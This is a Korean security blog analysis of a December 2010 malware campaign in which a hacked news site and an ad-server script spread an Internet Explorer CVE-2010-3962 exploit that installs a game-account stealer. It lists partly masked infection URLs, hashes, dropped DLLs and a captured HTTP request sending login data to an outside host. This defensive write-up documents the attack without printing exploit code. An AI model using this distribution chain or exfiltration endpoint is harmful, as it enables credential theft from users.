울지않는벌새 : Security, Movie & Society

악성코드 유포 : 유명 언론 사이트 해킹을 통한 온라인 게임 계정 탈취 (2010.12.13)

벌새::Analysis
11월 초에 공개된 Internet Explorer 제로데이(0-Day) 취약점 CVE-2010-3962은 전 세계적으로 한국과 중국에서 가장 활발하게 악용되는 것으로 최근 마이크로소프트(Microsoft)에서 발표를 한 적이 있습니다.

최근에는 해당 취약점과 더불어 추가적인 악성 스크립트를 포함하여 보안 제품의 진단을 우회하는 경향이 강하게 나타나고 있으므로 인터넷 사용자들은 반드시 유명 보안 제품의 실시간 감시 기능을 활성화하시고 이용하시기 바랍니다.

참고로 CVE-2010-3962 취약점은 12월 15일에 12월 마이크로소프트 정기 업데이트에서 보안 패치가 제공되는 것으로 알려져 있으므로 반드시 설치하시기 바랍니다.

이번 주말을 이용한 악성코드 유포 중 눈에 띄는 사례는 국내 유명 J 언론 사이트를 해킹하여 악성 스크립트(1.html / 2.html)를 등록하고, 또 다른 온라인 광고 서버의 특정 스크립트 파일 내부에 악성 iframe을 추가하여 다양한 인터넷 사이트에서 유포가 이루어지도록 구성한 점이 특징입니다.


해당 그림은 특정 광고 서버의 정상적인 스크립트 파일 내부에 Base64로 인코딩한 iframe을 추가하여 해당 광고가 포함된 인터넷 사이트를 방문할 경우 실행되도록 구성되어 있습니다.

[광고 서버 악성코드 유포 경로]

h**p://ad.**tive.co.kr/js/shiny_Rolling.js
 ㄴ h**p://ad.**tive.co.kr/js/h&#x74~(생략)~;ml

해당 iframe은 국내 J 언론 사이트가 해킹되어 등록된 파일로 연결이 이루어지고 있으며, 세부적인 유포 경로는 다음과 같습니다.

h**p://cutyline.zuzu***.jo***.com/illust/data/1212/index.html
 ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/load.html
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/1.html (Hauri ViRobot : JS.S.Agent.4543)
     ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/k.js
     ㄴ h**p://down.play***.info/1210.exe
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/2.html (nProtect : Script-JS/W32.Agent.AXB)
     ㄴ h**p://down.play***.info/1210.exe
 ㄴ h**p://s14.cnzz.com/stat.php?id=2508468&web_id=2508468

2.html 파일은 CVE-2010-3962 취약점을 이용한 것으로 Internet Explorer를 이용하여 접속한 사용자의 경우 보안 제품에서 진단하지 않는다면 자동으로 감염이 이루어지고 있는 상태입니다.

참고로 예전에는 CVE-2010-3962 취약점만을 이용하였지만 최근에는 추가적인 악성 스크립트를 통해 감염률을 증가시키는 것으로 보입니다.

해당 2개의 악성 스크립트를 통해 최종적으로 사용자 PC에 생성되는 1210.exe (SHA1 : 6f6d41f0a014ad80a1990047b74f59e11c673021) 파일에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Agent.81920.ADW (VirusTotal : 24/43) 진단명으로 진단되고 있습니다.

출처 : 안철수연구소(AhnLab)


참고로 해당 진단명의 경우 현재 시간 진단 비율이 증가하고 있는 것을 확인할 수 있습니다.

[생성 파일 등록 정보]

C:\WINDOWS\system32\imm32.dll :: 수정된 악성 imm32.dll 파일 - 114,176 Bytes
C:\WINDOWS\system32\imm32.dll.log :: imm32.dll 백업 정상 파일 - 110,080 Bytes
C:\WINDOWS\system32\ole.dll

[생성 파일 진단 정보]

C:\WINDOWS\system32\imm32.dll (SHA1 : 9f16c4e71b42313ef75d0837525586726660c031)
 - AhnLab V3 : Trojan/Win32.Patched (VirusTotal : 22/41)

C:\WINDOWS\system32\ole.dll (SHA1 : 35dda46cd4f43320273f97304a37e7faa11f1e3a)
 - AhnLab V3 : Win-Trojan/Agent.53248.ASE (VirusTotal : 17/43)

해당 악성코드는 기존부터 이용되던 imm32.dll 정상 파일을 악성 파일로 바꿔치기를 하여 것을 확인할 수 있으며, 해당 파일 변조에 대해 보안 업체에서는 전용 백신 및 수동 조치 방법을 공개하고 있습니다.

감염된 PC에서는 V3 보안 제품 등을 무력화하여 자신을 보호하며, 사용자가 웹 브라우저를 실행하여 다양한 온라인 게임 사이트에서 로그인을 시도할 경우 계정 정보를 외부로 유출하는 것으로 알려져 있습니다.

ole.dll

[한게임 로그인시 네트워크 연결 정보]

POST /hgrt/lin.asp?CODE=HQTITnHTLRTTQQ~(생략)~IpopIpmpopVRJpmQVRIT HTTP/1.1
Accept: image/gif, */*
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d86c3324596
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: with.freeoicq.info
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache

실제 한게임 사이트에서 사용자가 로그인을 시도할 경우 홍콩(HongKong)에 호스팅된 특정 서버로 정보가 유출되는 것을 확인할 수 있었습니다.

그러므로 위와 같은 악성코드에 감염된 사용자는 치료가 완료될 때까지 절대로 온라인 게임 등 인터넷 사이트 로그인을 하지 않도록 주의하시기 바라며, 조만간 공개될 보안 패치 업데이트를 반드시 설치하시고 인터넷을 이용하시기 바랍니다.